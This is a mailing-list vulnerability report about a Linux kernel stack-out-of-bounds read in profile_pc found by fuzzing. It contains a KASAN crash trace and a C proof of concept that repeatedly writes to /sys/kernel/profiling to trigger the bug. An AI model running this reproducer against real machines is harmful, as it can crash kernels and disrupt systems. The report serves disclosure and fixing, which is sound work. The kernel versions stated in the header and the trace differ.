|
Message-ID: <OSZP286MB1910B2AA75597E9B1724117EAA6D9@OSZP286MB1910.JPNP286.PROD.OUTLOOK.COM> Date: Thu, 18 Aug 2022 05:41:30 +0000 From: 黄 晓 <NigelXiao@...look.com> To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com> Subject: Linux kernel: stack-out-of-bounds in profile_pc Hello: I found a bug through the syzkaller fuzz tool, you need to set CONFIG_KASAN=y, the crash information is displayed as out-of-bounds reading, I am weak and unable to analyze the harm of this bug. The bug program cannot be reproduced stably and needs to be run multiple times. Kernel version: 5.18.14 gcc version: 9.4.0 [ 49.449543] ================================================================== [ 49.463836] BUG: KASAN: stack-out-of-bounds in profile_pc+0x59/0x90 [ 49.466434] Read of size 8 at addr ffff88800a137cd0 by task sh/105 [ 49.466879] [ 49.467144] CPU: 2 PID: 105 Comm: sh Not tainted 5.17.9 #3 [ 49.467436] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 [ 49.467774] Call Trace: [ 49.467954] <IRQ> [ 49.468121] dump_stack_lvl+0x34/0x44 [ 49.474368] print_address_description.constprop.0+0x21/0x150 [ 49.478895] ? profile_pc+0x59/0x90 [ 49.479192] ? profile_pc+0x59/0x90 [ 49.479479] kasan_report.cold+0x7f/0x11b [ 49.479684] ? profile_pc+0x59/0x90 [ 49.479874] ? _raw_spin_lock+0x92/0xd0 [ 49.480112] profile_pc+0x59/0x90 [ 49.480438] profile_tick+0x67/0x90 [ 49.480974] tick_sched_timer+0x7c/0xa0 [ 49.482393] __hrtimer_run_queues+0x1c6/0x420 [ 49.482901] ? tick_sched_handle.isra.0+0x80/0x80 [ 49.483139] ? enqueue_hrtimer+0xf0/0xf0 [ 49.483329] ? _raw_read_lock_bh+0x40/0x40 [ 49.483669] ? recalibrate_cpu_khz+0x10/0x10 [ 49.483959] ? recalibrate_cpu_khz+0x10/0x10 [ 49.484137] ? ktime_get_update_offsets_now+0x96/0x150 [ 49.484531] hrtimer_interrupt+0x1b6/0x350 [ 49.484777] __sysvec_apic_timer_interrupt+0xac/0x200 [ 49.485025] sysvec_apic_timer_interrupt+0x89/0xc0 [ 49.485554] </IRQ> [ 49.485759] <TASK> [ 49.485879] asm_sysvec_apic_timer_interrupt+0x12/0x20 [ 49.486309] RIP: 0010:_raw_spin_lock+0x92/0xd0 [ 49.486720] Code: 24 20 00 00 00 00 e8 0d 82 ee fe be 04 00 00 00 48 8d 7c 24 20 e8 fe 81 ee fe ba 01 00 00 00 8b 44 24 20 f0 0f b1 55 00 75 29 <48> b8 00 00 00 00 00 fc ff df 48 c7 04 03 00 00 00 004 [ 49.487645] RSP: 0000:ffff88800a137cd0 EFLAGS: 00000246 [ 49.488392] RAX: 0000000000000000 RBX: 1ffff11001426f9a RCX: ffffffff82445932 [ 49.488762] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff88800a137cf0 [ 49.489162] RBP: ffffea000027f228 R08: 0000000000000001 R09: ffffed1001426f9f [ 49.489577] R10: 0000000000000003 R11: ffffed1001426f9e R12: 0000000009fc8067 [ 49.489926] R13: ffff888000000688 R14: 000fffffffe00000 R15: 0000000009fc8067 [ 49.490285] ? _raw_spin_lock+0x82/0xd0 [ 49.490602] ? _raw_spin_lock_irqsave+0xe0/0xe0 [ 49.490844] ? _raw_spin_unlock+0x16/0x30 [ 49.491148] ? do_wp_page+0x389/0x5f0 [ 49.491368] __handle_mm_fault+0x633/0x10d0 [ 49.491576] ? __pmd_alloc+0x240/0x240 [ 49.491764] ? down_read_trylock+0x102/0x160 [ 49.491978] handle_mm_fault+0x99/0x220 [ 49.492183] do_user_addr_fault+0x272/0x870 [ 49.492380] exc_page_fault+0x57/0xc0 [ 49.492577] ? asm_exc_page_fault+0x8/0x30 [ 49.492775] asm_exc_page_fault+0x1e/0x30 [ 49.492975] RIP: 0033:0x44c5ba [ 49.493374] Code: 00 48 8d 57 07 48 83 fa 0e 76 09 48 c1 ff 03 e8 29 d2 ff ff 49 83 c7 08 eb b1 c6 83 d1 00 00 00 00 e8 b4 c1 ff ff 41 83 fd 02 <c6> 05 38 4b 28 00 00 0f 84 a7 00 00 00 41 f6 44 24 1f5 [ 49.494114] RSP: 002b:00007fff75b9d630 EFLAGS: 00000293 [ 49.494334] RAX: 0000000001c5b010 RBX: 0000000001c5b010 RCX: 00007f6523d29760 [ 49.494599] RDX: 0000000000000000 RSI: 0000000001c5b370 RDI: 0000000000000000 [ 49.494922] RBP: 0000000001c5b370 R08: 00007f652424f740 R09: 0000000000000000 [ 49.495274] R10: 00007f652424fa10 R11: 0000000000000246 R12: 0000000001c5d950 [ 49.495550] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000001c5b2f0 [ 49.495851] </TASK> [ 49.496028] [ 49.496167] The buggy address belongs to the page: [ 49.496496] page:(____ptrval____) refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xa137 [ 49.497096] flags: 0x100000000000000(node=0|zone=1) [ 49.497612] raw: 0100000000000000 ffffea0000284dc8 ffffea0000284dc8 0000000000000000 [ 49.497851] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 [ 49.498061] page dumped because: kasan: bad access detected [ 49.498263] [ 49.498325] addr ffff88800a137cd0 is located in stack of task sh/105 at offset 0 in frame: [ 49.498527] _raw_spin_lock+0x0/0xd0 [ 49.498920] [ 49.498992] this frame has 1 object: [ 49.501589] [32, 36) 'val' [ 49.501741] [ 49.502017] Memory state around the buggy address: [ 49.502406] ffff88800a137b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 49.502818] ffff88800a137c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 49.503125] >ffff88800a137c80: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f3 [ 49.503502] ^ [ 49.504015] ffff88800a137d00: f3 f3 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 [ 49.504269] ffff88800a137d80: f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 49.504626] ================================================================== [ 49.504961] Disabling lock debugging due to kernel taint POC: ''' #define _GNU_SOURCE #include <endian.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> uint64_t r[1] = {0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); intptr_t res = 0; memcpy((void*)0x20000040, "/sys/kernel/profiling", 21); res = syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000040ul, 0xe8502ul, 0ul); if (res != -1) r[0] = res; sprintf((char*)0x200000c0, "%023llo", (long long)r[0]); sprintf((char*)0x200000d7, "%020llu", (long long)-1); sprintf((char*)0x200000eb, "%023llo", (long long)-1); sprintf((char*)0x20000102, "%020llu", (long long)-1); sprintf((char*)0x20000116, "%023llo", (long long)-1); sprintf((char*)0x2000012d, "%023llo", (long long)r[0]); while(1)syscall(__NR_write, r[0], 0x200000c0ul, 0xbul); return 0; } ''' GK
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.